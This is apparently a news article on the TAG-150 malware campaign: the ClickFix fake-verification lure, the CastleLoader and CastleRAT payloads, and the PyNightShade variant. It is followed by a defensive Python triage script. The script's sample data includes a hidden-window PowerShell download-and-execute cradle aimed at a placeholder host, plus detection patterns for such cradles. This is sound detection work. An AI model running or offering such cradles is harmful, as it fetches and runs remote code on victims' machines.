ClickFix initial access page example | Image: eSentire Threat Response Unit (TRU)
A new and aggressive player has entered the cybercrime arena. A recent report from Darktrace sheds light on TAG-150, a Malware-as-a-Service (MaaS) operator that has rapidly escalated its activities since emerging in early 2025. By combining sophisticated social engineering with modular custom malware, the group has successfully compromised hundreds of devices across the United States in just a few short months.
First observed in March 2025, TAG-150 has wasted no time establishing a formidable infrastructure. According to the report, the group is “demonstrating rapid development and an expansive, evolving infrastructure designed to support its malicious operations.”
The scale of their early success is alarming. “As of May 2025, CastleLoader alone had infected a reported 469 devices, underscoring the scale and sophistication of TAG-150’s campaign.” This rapid proliferation is driven by a primary focus on targets within the United States, utilizing a two-pronged malware approach.
TAG-150’s entry vector relies less on technical exploits and more on manipulating human behavior through a technique called ClickFix. This method involves directing users to deceptive domains that perfectly mimic legitimate software interfaces, such as Google Meet or browser update notifications.
Instead of asking the user to download a file, the site claims the user is missing a “verification step” or update. “When a user clicks on a spoofed Cloudflare ‘Verification Step’ prompt… The server’s response is then automatically copied to the user’s clipboard using the ‘unsecured CopyToClipboard()’ function”. The user is then tricked into pasting this content—a malicious PowerShell command—into their terminal, effectively hacking themselves.
Once the victim executes the command, TAG-150 deploys its custom toolkit. The attack begins with CastleLoader, a sophisticated loader that uses “dead-code insertion and packing to hinder both static and dynamic analysis.”
“TAG-150 leverages CastleLoader as its initial delivery mechanism, with CastleRAT acting as the main payload.” This modular separation allows the attackers to keep their most valuable tools hidden until the initial infection is secured.
The final payload, CastleRAT, grants the attackers total control. “Once deployed, CastleRAT grants attackers extensive control over the compromised system, enabling capabilities such as keylogging, screen capturing, and remote shell access.”
The report also highlights a particularly stealthy Python-based variant of their RAT, dubbed PyNightShade. This variant is “engineered with stealth in mind, showing minimal detection across antivirus platforms.” It notably communicates with the legitimate geolocation service ip-api[.]com to profile the victim’s location before fully engaging, ensuring they are striking their intended targets.
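The ClickFix flow described above (a clipboard-delivered PowerShell command that the victim launches by hand) and the ip-api[.]com profiling lookup attributed to PyNightShade both leave host telemetry a defender can query. The following added example is not code from Darktrace or the report: it applies simple heuristic rules to constructed Sysmon-style process-creation and DNS events, and the event format, the placeholder domain and the regex patterns are the editor's assumptions.

```python
"""Heuristic triage for ClickFix-style activity over constructed host events."""
import re

# Constructed sample telemetry (not real TAG-150 data): a benign scheduled
# PowerShell run, a PowerShell cradle launched from the Run dialog (so
# explorer.exe is the parent), and two lookups of the geolocation service.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"type": "process", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr http://placeholder.invalid/x | iex\""},
    {"type": "dns", "image": "C:\\Users\\victim\\AppData\\Local\\Temp\\python.exe",
     "query": "ip-api.com"},
    {"type": "dns", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "query": "ip-api.com"},
]

# Shells a user can reach from Win+R or a terminal and paste a command into.
INTERACTIVE_SHELLS = re.compile(r"(powershell|pwsh|cmd)\.exe$", re.I)
# Download-and-execute cradles and evasion flags typical of pasted ClickFix
# commands (editor's heuristic list, not taken from the report).
CRADLE = re.compile(r"(iwr|invoke-webrequest|curl|invoke-expression|\biex\b|"
                    r"-enc\w*|-w(indowstyle)?\s+hidden)", re.I)
# Geolocation service the report says PyNightShade contacts before engaging.
PROFILING_DOMAINS = {"ip-api.com"}
BROWSERS = re.compile(r"(chrome|firefox|msedge|iexplore)\.exe$", re.I)


def triage_events(events):
    """Return (rule_name, event) pairs for events matching the heuristics."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            is_shell = INTERACTIVE_SHELLS.search(ev["image"])
            if is_shell and CRADLE.search(ev["cmdline"]):
                # A shell spawned by explorer.exe means the command came from
                # the Run dialog / a pasted launch rather than a script host.
                from_desktop = ev["parent"].lower().endswith("\\explorer.exe")
                rule = "clickfix_cradle_from_run_dialog" if from_desktop else "clickfix_cradle"
                findings.append((rule, ev))
        elif ev["type"] == "dns":
            # A browser asking for ip-api.com is routine; a process in Temp is not.
            if ev["query"].lower() in PROFILING_DOMAINS and not BROWSERS.search(ev["image"]):
                findings.append(("geo_profiling_non_browser", ev))
    return findings


if __name__ == "__main__":
    for rule, ev in triage_events(SAMPLE_EVENTS):
        print(rule, ev.get("cmdline") or ev.get("query"))
```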